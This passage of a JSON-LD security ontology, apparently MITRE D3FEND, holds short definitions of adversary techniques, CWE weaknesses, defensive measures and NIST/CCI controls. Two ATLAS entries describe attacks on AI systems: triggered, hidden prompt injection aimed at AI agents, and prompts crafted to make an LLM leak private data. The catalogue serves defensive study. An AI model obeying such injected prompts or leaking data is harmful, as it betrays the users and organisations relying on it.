      },
      "d3f:definition": "Adversaries may register malicious password filter dynamic link libraries (DLLs) into the authentication process to acquire user credentials as they are validated.",
      "d3f:modifies": {
        "@id": "d3f:SystemConfigurationDatabaseRecord"
      },
      "rdfs:label": "Password Filter DLL",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:T1556"
        },
        {
          "@id": "_:N21fe6aa374aa4c83815c7f3706c02e64"
        },
        {
          "@id": "_:N2acd0ce09e8d4e01bdbc3e9271b74d74"
        }
      ]
    },
    {
      "@id": "_:N21fe6aa374aa4c83815c7f3706c02e64",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:creates"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:SharedLibraryFile"
      }
    },
    {
      "@id": "_:N2acd0ce09e8d4e01bdbc3e9271b74d74",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:modifies"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:SystemConfigurationDatabaseRecord"
      }
    },
    {
      "@id": "d3f:CloudServiceAuthorization",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "Cloud authorization is the function of specifying access rights to cloud resources.",
      "rdfs:label": "Cloud Service Authorization",
      "rdfs:subClassOf": {
        "@id": "d3f:Authorization"
      }
    },
    {
      "@id": "d3f:CCI-001767_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The organization employs an allow-all, deny-by-exception policy to prohibit the execution of unauthorized software programs on the information system.",
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:narrower": {
        "@id": "d3f:ExecutableDenylisting"
      },
      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2013-02-28T00:00:00"
      },
      "rdfs:label": "CCI-001767"
    },
    {
      "@id": "d3f:HostShutdown",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:HostShutdown",
        "d3f:ProcessTermination"
      ],
      "d3f:d3fend-id": "D3-HS",
      "d3f:definition": "Initiating a host's shutdown sequence to terminate all running processes.",
      "d3f:kb-article": "## How It Works\n\nHost shutdown can either be initiated in the physical presence of the device using the power functions or remotely using the provided user interface or an installed EDR agent (with the available function). This process may allow for the removal of specific types of malware, such as fileless malware, and can also prevent further damage, for example, if the system is part of a botnet.\n\n## Considerations\n\n- If the attacker has established persistence, this technique may not be effective.\n- Compromised systems may not respond to remote commands to shut down or reboot, requiring physical intervention.\n- Shutting down a system will usually result in the loss of memory state that can be useful in forensic activities, so this should be considered when deciding to shut down.\n- Shutting down systems may disrupt access to computer resources for legitimate users.",
      "d3f:kb-reference": {
        "@id": "d3f:Reference-NearMemoryInMemoryDetectionofFilelessMalware"
      },
      "d3f:terminates": {
        "@id": "d3f:Process"
      },
      "rdfs:label": "Host Shutdown",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ProcessEviction"
        },
        {
          "@id": "_:N30afb43087424e7abacde0963c54dddd"
        }
      ]
    },
    {
      "@id": "_:N30afb43087424e7abacde0963c54dddd",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:terminates"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Process"
      }
    },
    {
      "@id": "d3f:WindowsNtQuerySystemTime",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "Returns the current time in Coordinated Universal Time (UTC) in an 8-byte format.",
      "rdfs:label": "Windows NtQuerySystemTime",
      "rdfs:seeAlso": {
        "@id": "https://j00ru.vexillium.org/syscalls/nt/64/"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:OSAPIGetSystemTime"
      }
    },
    {
      "@id": "d3f:AML.T0051.002",
      "@type": "owl:Class",
      "d3f:attack-id": "AML.T0051.002",
      "d3f:definition": "An adversary may trigger a prompt injection via a user action or event that occurs within the victim's environment. Triggered prompt injections often target AI agents, which can be activated by means the adversary identifies during [Discovery](/tactics/AML.TA0008) (See [Activation Triggers](/techniques/AML.T0084.002)). These malicious prompts may be hidden or obfuscated from the user and may already exist somewhere in the victim's environment from the adversary performing [Prompt Infiltration via Public-Facing Application](/techniques/AML.T0093). This type of injection may be used by the adversary to gain a foothold in the system or to target an unwitting user of the system.",
      "rdfs:label": "Triggered - ATLAS",
      "rdfs:seeAlso": {
        "@id": "https://atlas.mitre.org/techniques/AML.T0051.002"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:AML.T0051"
      },
      "skos:prefLabel": "Triggered"
    },
    {
      "@id": "d3f:ForwardProxyServer",
      "@type": "owl:Class",
      "d3f:definition": "A forward (or open) proxy is a proxy server that is accessible by any Internet user. Generally, a proxy server only allows users within a network group (i.e. a closed proxy) to store and forward Internet services such as DNS or web pages to reduce and control the bandwidth used by the group. With an open proxy, however, any user on the Internet is able to use this forwarding service.",
      "rdfs:isDefinedBy": {
        "@id": "dbr:Open_proxy"
      },
      "rdfs:label": "Forward Proxy Server",
      "rdfs:subClassOf": {
        "@id": "d3f:ProxyServer"
      }
    },
    {
      "@id": "d3f:CWE-49",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-49",
      "d3f:definition": "The product accepts path input in the form of trailing slash ('filedir/') without appropriate validation, which can lead to ambiguous path resolution and allow an attacker to traverse the file system to unintended locations or access arbitrary files.",
      "rdfs:label": "Path Equivalence: 'filename/' (Trailing Slash)",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:CWE-162"
        },
        {
          "@id": "d3f:CWE-41"
        }
      ]
    },
    {
      "@id": "d3f:EX-0009.02",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "EX-0009.02",
      "d3f:definition": "At the OS layer the attacker targets primitives that schedule work and mediate hardware. Maintenance builds may expose shells or management consoles; misconfigurations around these interfaces can provide paths to command interpreters or privileged syscalls. Exploitation yields kernel-mode execution, arbitrary memory read/write, or control of scheduling and address spaces, letting the actor tamper with FSW processes, intercept command paths, or manipulate storage and bus drivers beneath application checks. The technique leverages generic OS weaknesses adapted to the spacecraft’s particular build, turning low-level control into mission-facing effects that appear to originate from legitimate processes.",
      "d3f:modifies": {
        "@id": "d3f:OperatingSystem"
      },
      "rdfs:label": "Operating System - SPARTA",
      "rdfs:seeAlso": {
        "@id": "https://sparta.aerospace.org/technique/EX-0009/02/"
      },
      "rdfs:subClassOf": [
        {
          "@id": "d3f:EX-0009"
        },
        {
          "@id": "_:N4aa37a6266cb4c89b862170ac0e4a81a"
        }
      ],
      "skos:prefLabel": "Operating System"
    },
    {
      "@id": "_:N4aa37a6266cb4c89b862170ac0e4a81a",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:modifies"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:OperatingSystem"
      }
    },
    {
      "@id": "d3f:ExecutableScript",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "An executable script is written in a scripting language and interpreted at run time. This is in contrast with an executable binary, which contains machine code instructions for a physical CPU or byte code for a virtual machine.",
      "rdfs:label": "Executable Script",
      "rdfs:seeAlso": {
        "@id": "dbr:Executable"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:ExecutableFile"
      }
    },
    {
      "@id": "d3f:CWE-263",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-263",
      "d3f:definition": "The product supports password aging, but the expiration period is too long.",
      "rdfs:label": "Password Aging with Long Expiration",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-1390"
      }
    },
    {
      "@id": "d3f:WriteFile",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "The write is one of the most basic routines provided by a Unix-like operating system kernel. It writes data from a buffer declared by the user to a given device, such as a file. This is the primary way to output data from a program by directly using a system call. The destination is identified by a numeric code. The data to be written, for instance a piece of text, is defined by a pointer and a size, given in number of bytes. write thus takes three arguments.",
      "d3f:modifies": {
        "@id": "d3f:File"
      },
      "rdfs:isDefinedBy": {
        "@id": "dbr:Write_(system_call)"
      },
      "rdfs:label": "Write File",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:SystemCall"
        },
        {
          "@id": "_:Nb1e79fcc08f04e9ca2a06c86230218fb"
        }
      ]
    },
    {
      "@id": "_:Nb1e79fcc08f04e9ca2a06c86230218fb",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:modifies"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:File"
      }
    },
    {
      "@id": "d3f:Reference-IndirectBranchingCalls",
      "@type": [
        "owl:NamedIndividual",
        "d3f:AcademicPaperReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://citeseerx.ist.psu.edu/viewdoc/download?doi=10.1.1.1048.1241&rep=rep1&type=pdf"
      },
      "d3f:kb-abstract": "Return-oriented programming (ROP) has become the\nprimary exploitation technique for system compromise\nin the presence of non-executable page protections. ROP\nexploits are facilitated mainly by the lack of complete\naddress space randomization coverage or the presence\nof memory disclosure vulnerabilities, necessitating additional ROP-specific mitigations.\nIn this paper we present a practical runtime ROP exploit prevention technique for the protection of third-party applications. Our approach is based on the detection of abnormal control transfers that take place during\nROP code execution. This is achieved using hardware\nfeatures of commodity processors, which incur negligible runtime overhead and allow for completely transparent operation without requiring any modifications to\nthe protected applications. Our implementation for Windows 7, named kBouncer, can be selectively enabled for\ninstalled programs in the same fashion as user-friendly\nmitigation toolkits like Microsoft's EMET. The results of\nour evaluation demonstrate that kBouncer has low runtime overhead of up to 4%, when stressed with specially\ncrafted workloads that continuously trigger its core detection component, while it has negligible overhead for\nactual user applications. In our experiments with in-the-wild ROP exploits, kBouncer successfully protected all\ntested applications, including Internet Explorer, Adobe\nFlash Player, and Adobe Reader.",
      "d3f:kb-author": "Vasilis Pappas, Michalis Polychronakis, Angelos D. Keromytis\nColumbia University",
      "d3f:kb-organization": "Columbia University",
      "d3f:kb-reference-of": {
        "@id": "d3f:IndirectBranchCallAnalysis"
      },
      "d3f:kb-reference-title": "Transparent ROP Exploit Mitigation using Indirect Branch Tracing",
      "rdfs:label": "Reference - Indirect Branching Calls"
    },
    {
      "@id": "d3f:CWE-252",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-252",
      "d3f:definition": "The product does not check the return value from a method or function, which can prevent it from detecting unexpected states and conditions.",
      "rdfs:label": "Unchecked Return Value",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-754"
      }
    },
    {
      "@id": "d3f:CWE-923",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-923",
      "d3f:definition": "The product establishes a communication channel to (or from) an endpoint for privileged or protected operations, but it does not properly ensure that it is communicating with the correct endpoint.",
      "rdfs:label": "Improper Restriction of Communication Channel to Intended Endpoints",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-284"
      }
    },
    {
      "@id": "d3f:SessionTermination",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:SessionTermination"
      ],
      "d3f:d3fend-id": "D3-ST",
      "d3f:definition": "Forcefully end all active sessions associated with compromised accounts or devices.",
      "d3f:deletes": {
        "@id": "d3f:Session"
      },
      "d3f:kb-article": "Defined in NIST 800-53 as AC-12.",
      "d3f:kb-reference": {
        "@id": "d3f:Reference-NIST-Special-Publication-800-53A-Revision-5"
      },
      "rdfs:label": "Session Termination",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ProcessEviction"
        },
        {
          "@id": "_:Nb71e2427a12f42498b278437c9c65805"
        }
      ]
    },
    {
      "@id": "_:Nb71e2427a12f42498b278437c9c65805",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:deletes"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Session"
      }
    },
    {
      "@id": "d3f:CWE-1109",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-1109",
      "d3f:definition": "The code contains a callable, block, or other code element in which the same variable is used to control more than one unique task or store more than one instance of data.",
      "rdfs:label": "Use of Same Variable for Multiple Purposes",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-1078"
      }
    },
    {
      "@id": "d3f:T1213.001",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:accesses": {
        "@id": "d3f:WebFileResource"
      },
      "d3f:attack-id": "T1213.001",
      "d3f:definition": "Adversaries may leverage Confluence repositories to mine valuable information. Often found in development environments alongside Atlassian JIRA, Confluence is generally used to store development-related documentation; however, in general it may contain more diverse categories of useful information.",
      "rdfs:label": "Confluence",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:T1213"
        },
        {
          "@id": "_:N7926f4eda6bd4df6aa5216d744fec216"
        }
      ]
    },
    {
      "@id": "_:N7926f4eda6bd4df6aa5216d744fec216",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:accesses"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:WebFileResource"
      }
    },
    {
      "@id": "d3f:Reference-MethodForControllingComputerNetworkSecurity_CheckpointSoftwareTechnologiesLtd",
      "@type": [
        "owl:NamedIndividual",
        "d3f:PatentReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://patents.google.com/patent/EP0658837B1/"
      },
      "d3f:kb-abstract": "A method of operating a security system for a computer network in which data is passed in said network as data packets, said system controlling the passage of said data packets in the network according to a security rule, where each aspect of said network controlled by said security rule has been defined, said security rule has been defined in terms of said aspects and converted into a set of filter language instructions.",
      "d3f:kb-author": "Gil Shwed",
      "d3f:kb-mitre-analysis": "",
      "d3f:kb-organization": "Checkpoint Software Technologies Ltd",
      "d3f:kb-reference-of": {
        "@id": "d3f:InboundTrafficFiltering"
      },
      "d3f:kb-reference-title": "Method for controlling computer network security",
      "rdfs:label": "Reference - Method for controlling computer network security - Checkpoint Software Technologies Ltd"
    },
    {
      "@id": "d3f:ATTACKMobileDiscoveryTechnique",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:enables": {
        "@id": "d3f:TA0032"
      },
      "rdfs:label": "Discovery Technique - ATTACK Mobile",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ATTACKMobileTechnique"
        },
        {
          "@id": "_:N446094426e9449b7acec88e8770e5a16"
        }
      ],
      "skos:prefLabel": "Discovery Technique"
    },
    {
      "@id": "_:N446094426e9449b7acec88e8770e5a16",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:enables"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:TA0032"
      }
    },
    {
      "@id": "d3f:ExecutionIsolation",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:ExecutionIsolation"
      ],
      "d3f:d3fend-id": "D3-EI",
      "d3f:definition": "Execution Isolation techniques prevent application processes from accessing non-essential system resources, such as memory, devices, or files.",
      "d3f:enables": {
        "@id": "d3f:Isolate"
      },
      "rdfs:label": "Execution Isolation",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:DefensiveTechnique"
        },
        {
          "@id": "_:N09a278c57e35415fa871d613c521dcf0"
        }
      ]
    },
    {
      "@id": "_:N09a278c57e35415fa871d613c521dcf0",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:enables"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Isolate"
      }
    },
    {
      "@id": "d3f:invokes",
      "@type": "owl:ObjectProperty",
      "d3f:definition": "x invokes y: The subject x invokes a system service by use of an instruction object y that interrupts the program being executed and passes control to the operating system to perform that operation.",
      "rdfs:isDefinedBy": {
        "@id": "http://wordnet-rdf.princeton.edu/id/06599393-n"
      },
      "rdfs:label": "invokes",
      "rdfs:seeAlso": {
        "@id": "dbr:System_call"
      },
      "rdfs:subPropertyOf": [
        {
          "@id": "d3f:executes"
        },
        {
          "@id": "d3f:may-invoke"
        }
      ],
      "skos:altLabel": "calls"
    },
    {
      "@id": "d3f:OTAbortCommandEvent",
      "@type": "owl:Class",
      "rdfs:label": "OT Abort Command Event",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:OTModifyDeviceOperatingModeCommandEvent"
        },
        {
          "@id": "_:Ne2ca788a90c94171b98ab9fcd5d14e22"
        },
        {
          "@id": "_:N9358d68d9fbf40f588b550f22f6bc12e"
        },
        {
          "@id": "_:Nfe3739685149441484451216d828fb2f"
        }
      ]
    },
    {
      "@id": "_:Ne2ca788a90c94171b98ab9fcd5d14e22",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:has-participant"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:OTAbortCommand"
      }
    },
    {
      "@id": "_:N9358d68d9fbf40f588b550f22f6bc12e",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:has-participant"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:OTControllerOperatingMode"
      }
    },
    {
      "@id": "_:Nfe3739685149441484451216d828fb2f",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:preceded-by"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:OTRunCommandEvent"
      }
    },
    {
      "@id": "d3f:T1220",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:adds": {
        "@id": "d3f:File"
      },
      "d3f:attack-id": "T1220",
      "d3f:definition": "Adversaries may bypass application control and obscure execution of code by embedding scripts inside XSL files. Extensible Stylesheet Language (XSL) files are commonly used to describe the processing and rendering of data within XML files. To support complex operations, the XSL standard includes support for embedded scripting in various languages. (Citation: Microsoft XSLT Script Mar 2017)",
      "d3f:interprets": {
        "@id": "d3f:ExecutableScript"
      },
      "d3f:invokes": {
        "@id": "d3f:CreateProcess"
      },
      "rdfs:label": "XSL Script Processing",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:DefenseEvasionTechnique"
        },
        {
          "@id": "_:N643f43352a1545ae850ae23aa95dd1bf"
        },
        {
          "@id": "_:N7d2c2895b76f42b3a1ed2571b22cf326"
        },
        {
          "@id": "_:Nd54d1dea1ad54fdca77cb2515d944c88"
        }
      ]
    },
    {
      "@id": "_:N643f43352a1545ae850ae23aa95dd1bf",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:adds"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:File"
      }
    },
    {
      "@id": "_:N7d2c2895b76f42b3a1ed2571b22cf326",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:interprets"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:ExecutableScript"
      }
    },
    {
      "@id": "_:Nd54d1dea1ad54fdca77cb2515d944c88",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:invokes"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:CreateProcess"
      }
    },
    {
      "@id": "d3f:WindowsCreateProcessA",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "Creates a new process and its primary thread. The new process runs in the security context of the calling process.",
      "d3f:invokes": [
        {
          "@id": "d3f:WindowsNtCreateProcess"
        },
        {
          "@id": "d3f:WindowsNtCreateProcessEx"
        }
      ],
      "rdfs:isDefinedBy": {
        "@id": "https://learn.microsoft.com/en-us/windows/win32/api/processthreadsapi/nf-processthreadsapi-createprocessa"
      },
      "rdfs:label": "Windows CreateProcessA",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:OSAPICreateProcess"
        },
        {
          "@id": "_:N114fdc6bd58d4adeade698e7e01e34aa"
        },
        {
          "@id": "_:N017bf9c7842d43cfa279dd57118aa8a5"
        }
      ]
    },
    {
      "@id": "_:N114fdc6bd58d4adeade698e7e01e34aa",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:invokes"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:WindowsNtCreateProcess"
      }
    },
    {
      "@id": "_:N017bf9c7842d43cfa279dd57118aa8a5",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:invokes"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:WindowsNtCreateProcessEx"
      }
    },
    {
      "@id": "d3f:CWE-841",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-841",
      "d3f:definition": "The product supports a session in which more than one behavior must be performed by an actor, but it does not properly ensure that the actor performs the behaviors in the required sequence.",
      "rdfs:label": "Improper Enforcement of Behavioral Workflow",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-691"
      }
    },
    {
      "@id": "d3f:CloudServiceProvider",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "A cloud service provider delivers scalable and distributed computing resources over a network, enabling clients to access infrastructure, platforms, and applications remotely.",
      "rdfs:label": "Cloud Service Provider",
      "rdfs:subClassOf": {
        "@id": "d3f:ServiceProvider"
      }
    },
    {
      "@id": "d3f:LinuxClone3ArgumentCLONE_THREAD",
      "@type": "owl:Class",
      "d3f:definition": "A flag parameter to the Clone3 syscall. If set, the child is placed in the same thread group as the calling process.",
      "rdfs:isDefinedBy": {
        "@id": "https://man7.org/linux/man-pages/man2/clone3.2.html"
      },
      "rdfs:label": "Linux Clone3 Argument CLONE_THREAD",
      "rdfs:subClassOf": {
        "@id": "d3f:OSAPICreateThread"
      }
    },
    {
      "@id": "d3f:CCI-000766_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The information system implements multifactor authentication for network access to non-privileged accounts.",
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:narrower": {
        "@id": "d3f:Multi-factorAuthentication"
      },
      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2009-09-17T00:00:00"
      },
      "rdfs:label": "CCI-000766"
    },
    {
      "@id": "d3f:WindowsProcess",
      "@type": [
        "owl:NamedIndividual",
        "d3f:Process"
      ],
      "rdfs:label": "Windows Process"
    },
    {
      "@id": "d3f:NIST_SP_800-53_R5_CM-6_3",
      "@type": [
        "owl:NamedIndividual",
        "d3f:NISTControl"
      ],
      "d3f:broader": {
        "@id": "d3f:ApplicationConfigurationHardening"
      },
      "d3f:control-name": "Configuration Settings | Unauthorized Change Detection",
      "d3f:member-of": {
        "@id": "d3f:NIST_SP_800-53_R5"
      },
      "rdfs:label": "CM-6(3)"
    },
    {
      "@id": "d3f:AML.T0057",
      "@type": "owl:Class",
      "d3f:attack-id": "AML.T0057",
      "d3f:definition": "Adversaries may craft prompts that induce the LLM to leak sensitive information.\nThis can include private user data or proprietary information.\nThe leaked information may come from proprietary training data, data sources the LLM is connected to, or information from other users of the LLM.",
      "rdfs:label": "LLM Data Leakage - ATLAS",
      "rdfs:seeAlso": {
        "@id": "https://atlas.mitre.org/techniques/AML.T0057"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:ATLASExfiltrationTechnique"
      },
      "skos:prefLabel": "LLM Data Leakage"
    },
    {
      "@id": "d3f:T1110.004",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "T1110.004",
      "d3f:definition": "Adversaries may use credentials obtained from breach dumps of unrelated accounts to gain access to target accounts through credential overlap. Occasionally, large numbers of username and password pairs are dumped online when a website or service is compromised and the user account credentials accessed. The information may be useful to an adversary attempting to compromise accounts by taking advantage of the tendency for users to use the same passwords across personal and business accounts.",
      "d3f:may-create": {
        "@id": "d3f:IntranetAdministrativeNetworkTraffic"
      },
      "d3f:modifies": {
        "@id": "d3f:AuthenticationLog"
      },
      "d3f:produces": {
        "@id": "d3f:Authentication"
      },
      "rdfs:label": "Credential Stuffing",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:T1110"
        },
        {
          "@id": "_:Nac6c82548acb4f7785e6a3551c7166be"
        },
        {
          "@id": "_:N0309ce98e2d44641b99dc8d2f60d8449"
        },
        {
          "@id": "_:Na040bd803fe7479e94c4be76b9218892"
        }
      ]
    },
    {
      "@id": "_:Nac6c82548acb4f7785e6a3551c7166be",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:may-create"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:IntranetAdministrativeNetworkTraffic"
      }
    },
    {
      "@id": "_:N0309ce98e2d44641b99dc8d2f60d8449",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:modifies"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:AuthenticationLog"
      }
    },
    {
      "@id": "_:Na040bd803fe7479e94c4be76b9218892",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:produces"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Authentication"
      }
    },
    {
      "@id": "d3f:CCI-001941_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The information system implements replay-resistant authentication mechanisms for network access to privileged accounts.",
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:narrower": {
        "@id": "d3f:One-timePassword"
      },
      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2013-05-03T00:00:00"
      },
      "rdfs:label": "CCI-001941"
    },
    {
      "@id": "d3f:ActiveCertificateAnalysis",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:ActiveCertificateAnalysis"
      ],
      "d3f:created": {
        "@type": "xsd:dateTime",
        "@value": "2020-08-05T00:00:00"
      },
      "d3f:d3fend-id": "D3-ACA",
      "d3f:definition": "Actively collecting PKI certificates by connecting to the server and downloading its server certificates for analysis.",
      "d3f:kb-article": "## How it works\nAnalysis of server certificates using active methods to detect if certificates have been misconfigured or spoofed by using elements of the certificate, certificate authorities and signatures.\n\n### Certificate validity analysis\nThis can be accomplished by verifying the digital signature on the certificate.\n\n### Certificate path analysis\nThe client's browser can perform path verification to ensure that the server's certificate contains a valid trust anchor.\n\n### Certificate configuration analysis\nSome browsers can be configured to implement the key-usage extensions contained in certificates. This can help to prevent a certificate from being misused.\n\n### Certificate revocation status analysis\nUsing either Certificate Revocation Lists (CRLs) or Online Certificate Status Protocol (OCSP) to determine the revocation status. OCSP Stapling, binding the status with the certificate, helps to mitigate potential delay in status verifications.\n\n## Considerations\n* Management of the PKI across the enterprise typically requires automation to maintain scalability and flexibility\n* If the certificate authority issuing the certificate is compromised, then all of the certificates issued by the CA are suspect\n* There may be delays associated with updates to certificates\n* Revoked certificates give the appearance of valid certificates until they are published to a trusted revocation service (OCSP or CRL)\n* The revocation service (OCSP or CRL) may be down during our connection and a browser will need to make a decision about trusting the connection",
      "d3f:kb-reference": {
        "@id": "d3f:Reference-SecuringWebTransactions"
      },
      "rdfs:label": "Active Certificate Analysis",
      "rdfs:subClassOf": {
        "@id": "d3f:CertificateAnalysis"
      }
    },
    {
      "@id": "d3f:CWE-755",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-755",
      "d3f:definition": "The product does not handle or incorrectly handles an exceptional condition.",
      "rdfs:label": "Improper Handling of Exceptional Conditions",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-703"
      }
    },
    {
      "@id": "d3f:IntranetAdministrativeNetworkTraffic",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "Intranet administrative network traffic is administrative network traffic that does not cross a given network's boundaries and uses a standard administrative protocol.",
      "rdfs:label": "Intranet Administrative Network Traffic",
      "rdfs:seeAlso": {
        "@id": "dbr:Intranet"
      },
      "rdfs:subClassOf": [
        {
          "@id": "d3f:AdministrativeNetworkTraffic"
        },
        {
          "@id": "d3f:IntranetNetworkTraffic"
        }
      ]
    },
    {
      "@id": "d3f:Reference-NIST-Special-Publication-800-160-Volume-1",
      "@type": [
        "owl:NamedIndividual",
        "d3f:GuidelineReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://doi.org/10.6028/NIST.SP.800-160v1"
      },
      "d3f:kb-abstract": "With the continuing frequency, intensity, and adverse consequences of cyber-attacks, disruptions, hazards, and other threats to federal, state, and local governments, the military, businesses, and the critical infrastructure, the need for trustworthy secure systems has never been more important to the long-term economic and national security interests of the United States. Engineering-based solutions are essential to managing the growing complexity, dynamicity, and interconnectedness of today’s systems, as exemplified by cyber-physical systems and systems-of-systems, including the Internet of Things. This publication addresses the engineering-driven perspective and actions necessary to develop more defensible and survivable systems, inclusive of the machine, physical, and human components that compose the systems and the capabilities and services delivered by those systems. It starts with and builds upon a set of well-established International Standards for systems and software engineering published by the International Organization for Standardization (ISO), the International Electrotechnical Commission (IEC), and the Institute of Electrical and Electronics Engineers (IEEE) and infuses systems security engineering methods, practices, and techniques into those systems and software engineering activities. The objective is to address security issues from a stakeholder protection needs, concerns, and requirements perspective and to use established engineering processes to ensure that such needs, concerns, and requirements are addressed with appropriate fidelity and rigor, early and in a sustainable manner throughout the life cycle of the system.",
      "d3f:kb-author": "Ron Ross, Michael McEvilley, and Janet Carrier Oren",
      "d3f:kb-organization": "NIST",
      "d3f:kb-reference-of": {
        "@id": "d3f:OperationalRiskAssessment"
      },
      "d3f:kb-reference-title": "NIST Special Publication 800-160 Volume 1 - Systems Security Engineering",
      "rdfs:label": "Reference - NIST Special Publication 800-160 Volume 1 - System Security Engineering"
    },
    {
      "@id": "d3f:Reference-DeadCodeElimination",
      "@type": [
        "owl:NamedIndividual",
        "d3f:AcademicPaperReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://nebelwelt.net/files/15LangSec.pdf"
      },
